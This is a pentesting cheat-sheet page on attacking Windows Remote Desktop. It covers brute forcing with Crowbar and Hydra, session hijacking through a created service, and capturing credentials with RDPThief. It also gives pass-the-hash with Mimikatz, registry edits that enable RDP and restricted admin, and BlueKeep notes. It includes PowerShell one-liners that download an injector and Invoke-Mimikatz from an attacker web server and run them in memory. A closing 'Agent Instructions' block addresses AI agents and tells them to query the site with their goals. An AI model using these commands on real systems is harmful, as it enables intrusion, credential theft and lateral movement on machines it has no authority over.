> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/recon-enumeration/pentesting-rdp.md). # Pentesting RDP ### CROWBAR * Remote desktop protocol with Crowbar * Crowbar is a network authentication cracking tool ``` sudo apt install crowbar ``` * Make a suitable wordlist * Attempt to bruteforce RDP ``` crowbar -b rdp -s $host/32 -u admin -C /usr/share/wordlist/rockyou.txt -n 1 -v # -b protocol # -s target server # -n number of threads (RDP doesnt reliably handle multiple threads) ``` * If errors are encountered like: File Not Found, convert the wordlist to UTF-8 ``` iconv -f ISO-8859-1 -t UTF-8 /usr/share/wordlists/rockyou.txt > rockyou_utf8.txt ``` ### RDP Session Hijacking * Must have SYSTEM privs ``` query user ``` * ``` tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} sc.exe create sessionhijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0" net start sessionhijack ``` ### SHARP RDP ``` SharpRDP.exe computername=appsrv01 command="powershell -c IEX" username=corp\dave password=lab ``` ### RDP Thief * `rdpthief.dll` must be on the local machine * Modify C# source with the location of the hidden `RDPThief.dll` on disk * C# RDP-Inject.exe runs in a while loop and injects into each RDP process in order to capture credentials from RDP * Dump captured credentials ``` type C:\Users\User\AppData\Local\Temp\3\data.bin ``` ``` $wc = New-Object System.Net.WebClient; $wc.Headers['User-Agent'] = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; $data = $wc.DownloadData('http://192.168.49.124/RDP-Inject.exe');$assem = [System.Reflection.Assembly]::Load($data);$entryPointMethod = $assem.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');$entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar'))) ``` * The above command pulls RDP-Thief from a remote webserver and loads it via powershell reflection. Ensure you update the arguments in the above command ### Screenshot the Desktop * You can take a screenshot of the desktop if NLA is disabled * with `netexec` ``` --nla-screenshot --screenshot --screentime SCREENTIME ``` * Resolution with WxH Default 1024x768 ``` --res RES ``` ### Enable RDP via Crackmapexec ``` nxc smb 10.129.203.121 -u julio -p Password1 -M rdp --options nxc smb 10.129.203.121 -u julio -p Password1 -M rdp -o ACTION=enable ``` ### Enable RDP via Registry ``` reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall add rule name=3389 protocol=TCP dir=in localip=any localport=3389 action=allow ``` ### Enable RDP access for user ``` net localgroup "Remote Desktop Users" joe /add ``` ``` Add-LocalGroupMember -Group 'Remote Desktop Users' -Member robert.lanza powershell -c 'Add-LocalGroupMember -Group "Remote Desktop Users" -Member john' powershell -c 'Add-LocalGroupMember -Group "Remote Desktop Users" -Member alice' ``` ### Remove Remote Desktop Access for user ``` Remove-LocalGroupMember -Group "Remote Desktop Users" -Member robert.lanza ``` ### If PTH is Disabled * Enable Restricted admin ``` reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f ``` ### RDesktop ## RDESKTOP ``` rdesktop 10.11.1.13 -u xxx -p xxx rdesktop 10.129.131.50 -u htb-student -p 'HTB_@cademy_stdnt!' ``` * Mount folders using RDesktop ``` rdesktop 10.129.131.50 -u htb-student -p 'HTB_@cademy_stdnt!' -r disk:linux='~/tools' ``` ### XFreeRDP ``` xfreerdp /v:$host /u:administrator /cert:ignore xfreerdp /v:10.11.1.31 /u:sa /p:poiuytrewq /cert:ignore ``` * All security certificates should be ignored ``` xfreerdp /v:10.129.131.50 /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution xfreerdp /v:10.11.1.247 /port:1234 /u:brett /p:ilovesecuritytoo ``` * Mount a folder on our attacker machine to the target machine ``` mkdir /tmp/filetransfer xfreerdp /v:10.129.131.50 /u:htb-student /p:'HTB_@cademy_stdnt!' /drive:~/tools ``` ``` # ERROR: If you encounter the below error add the below switch `[ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED` /tls-seclevel:0 ``` * Some other xfreerdp commands with options that have been helpful in the past ``` xfreerdp /v:manageengine /u:Administrator /p:studentlab /cert:ignore /tls-seclevel:0 /timeout:80000 /size:1920x1010 /scale:50 xfreerdp /u:blwasp /p:'Password123!' /v:10.129.230.38 /dynamic-resolution /drive:.,linux /bpp:8 /compression -themes -wallpaper /clipboard /audio-mode:0 /auto-reconnect -glyph-cache ``` FreeRDP 3 syntax is similar: ```bash xfreerdp3 /v:TARGET /u:USER /d:DOMAIN.LOCAL /p:'PASSWORD' /cert:ignore xfreerdp3 /v:TARGET /u:'.\LOCALUSER' /p:'PASSWORD' /cert:ignore ``` ### Pass The Hash RDP ``` xfreerdp /u:domain\username /pth: /v:$host ``` * If PTH is disabled, enable restricted admin ``` reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f ``` ### Validate RDP Access with NetExec When testing known users and passwords, use `--no-bruteforce` to try each username/password pair in order instead of spraying every password against every user: ```bash netexec rdp targets.txt -d DOMAIN.LOCAL -u users.txt -p passwords.txt --no-bruteforce netexec rdp TARGET -u USER -H NTLM_HASH --local-auth ``` RDP and WinRM authorization are separate. Credentials that work for RDP may still fail WinRM if the user is not allowed to use PowerShell remoting. ### PTH RDP From a Windows machine ``` sekurlsa::pth /user:admin /domain:corp1 /ntlm: /run:"mstsc.exe /restrictedadmin" $wc = New-Object System.Net.WebClient; $wc.Headers['User-Agent'] = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; $wc.DownloadString('http://192.168.49.120/Invoke-Mimikatz.ps1') | IEX Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:corp1 /ntlm: /run:mstsc.exe /restrictedadmin"' ``` ### Nmap ``` nmap -sV -sC 10.129.201.248 -p3389 --script rdp* ``` ### RDP Security Check ``` sudo cpan install Encoding::BER git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check ./rdp-sec-check.pl $host ``` *** ## Nmap Enumeration * Additional flags for RDP enumeration ``` nmap -sV -sC 10.129.201.248 -p3389 --packet-trace --disable-arp-ping -n ``` * NSE scripts: `rdp-enum-encryption`, `rdp-ntlm-info` — reveals OS version, domain name, and NTLM information from the RDP service *** ## Hydra RDP Brute Force ```bash hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp ``` *** ## BlueKeep (CVE-2019-0708) * Use-After-Free vulnerability in RDP (TCP 3389) * No authentication required — pre-authentication RCE * Achieves code execution as LocalSystem * Affects Windows 7, Windows Server 2008/2008 R2, Windows XP, Windows Vista * Approximately 950,000 hosts were initially vulnerable when disclosed --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://book.ice-wzl.xyz/recon-enumeration/pentesting-rdp.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.